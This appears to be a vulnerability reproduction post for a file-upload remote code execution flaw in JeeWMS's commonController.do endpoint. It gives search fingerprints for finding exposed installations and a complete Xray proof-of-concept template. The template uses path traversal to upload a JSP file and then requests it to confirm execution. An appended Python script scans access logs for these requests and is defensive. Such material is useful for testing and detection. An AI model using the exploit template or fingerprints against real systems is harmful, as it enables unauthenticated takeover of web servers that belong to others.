JeeWMS commonController.do File Upload to RCE Vulnerability Reproduction
Reference link:
https://axsec.blog.csdn.net/article/details/145476229
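Vulnerability description:
The JeeWMS commonController.do endpoint has a file upload vulnerability. An unauthenticated attacker can use it to execute arbitrary code on the server, write a backdoor, and obtain server privileges, thereby taking control of the entire web server.
Asset fingerprint: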
body="url:userController.do?userOrgSelect&userId=" && "loginController.do?changeDefaultOrg"
Xray-poc:
name: poc-yaml-jeewms-commoncontroller-cve-2024-57761-fileupload
transport: http
set:
  randname: randomLowercase(4)
  randint: randomInt(10000000, 99999999)
  rboundary: randomLowercase(16)
rules:
  r0:
    request:
      method: POST
      path: /rest/../commonController.do?parserXml
      follow_redirects: false
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randname}}.jsp\"\r\nContent-Type: image/png\r\n\r\n<% out.println(\"{{randint}}\");new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>\r\n------WebKitFormBoundary{{rboundary}}--"
    expression: response.status == 200 && response.body_string.contains("success\":true")
  r1:
    request:
      method: GET
      path: /{{randname}}.jsp
      follow_redirects: false
    expression: >-
      response.status == 200 && response.body_string.contains(string(randint))
expression: r0() && r1()
detail:
  author: Cysec
  links:
    - https://axsec.blog.csdn.net/article/details/145476229
  fofakeyword: body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro"或者fid="cC2r/XQpJXcYiYFHOc77bg=="
  description: JeeWMS commonController.do文件上传致RCE漏洞复现
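A log check for the two requests the PoC above sends, as an added example that is not part of the original post: it flags a POST to commonController.do?parserXml reached through a ".." path segment, and marks it confirmed when the same client then receives a 200 for a root-level .jsp. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in combined log format (not from a real server).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Mar/2025:10:00:01 +0000] "POST /rest/../commonController.do?parserXml HTTP/1.1" 200 41
198.51.100.7 - - [01/Mar/2025:10:00:02 +0000] "GET /abcd.jsp HTTP/1.1" 200 9
203.0.113.5 - - [01/Mar/2025:10:05:00 +0000] "GET /loginController.do?changeDefaultOrg HTTP/1.1" 200 5120
203.0.113.9 - - [01/Mar/2025:10:06:00 +0000] "POST /rest/../commonController.do?parserXml HTTP/1.1" 200 41
203.0.113.9 - - [01/Mar/2025:10:06:03 +0000] "GET /qwer.jsp HTTP/1.1" 404 0
203.0.113.5 - - [01/Mar/2025:10:07:00 +0000] "GET /index.jsp HTTP/1.1" 200 300
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    parts = urlsplit(target)
    return ip, method, unquote(parts.path), parts.query, int(status)

def is_upload_attempt(method, path, query):
    # Request shape of rule r0: POST to commonController.do?parserXml
    # reached through a dot-segment in the path.
    segs = path.split("/")
    return (method == "POST" and segs[-1] == "commonController.do"
            and "parserXml" in query and ".." in segs)

def scan(log_text):
    """Return (ip, severity, path) findings. 'confirmed' means the same client
    later got a 200 for a root-level .jsp, the request shape of rule r1."""
    pending, findings = set(), []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ip, method, path, query, status = rec
        if is_upload_attempt(method, path, query):
            pending.add(ip)
            findings.append((ip, "attempt", path))
        elif (ip in pending and method == "GET" and status == 200
              and re.fullmatch(r"/[^/]+\.jsp", path)):
            findings.append((ip, "confirmed", path))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The JSP in the PoC deletes itself after it runs, so the access log may be the only trace; a missing file on disk does not rule out a hit.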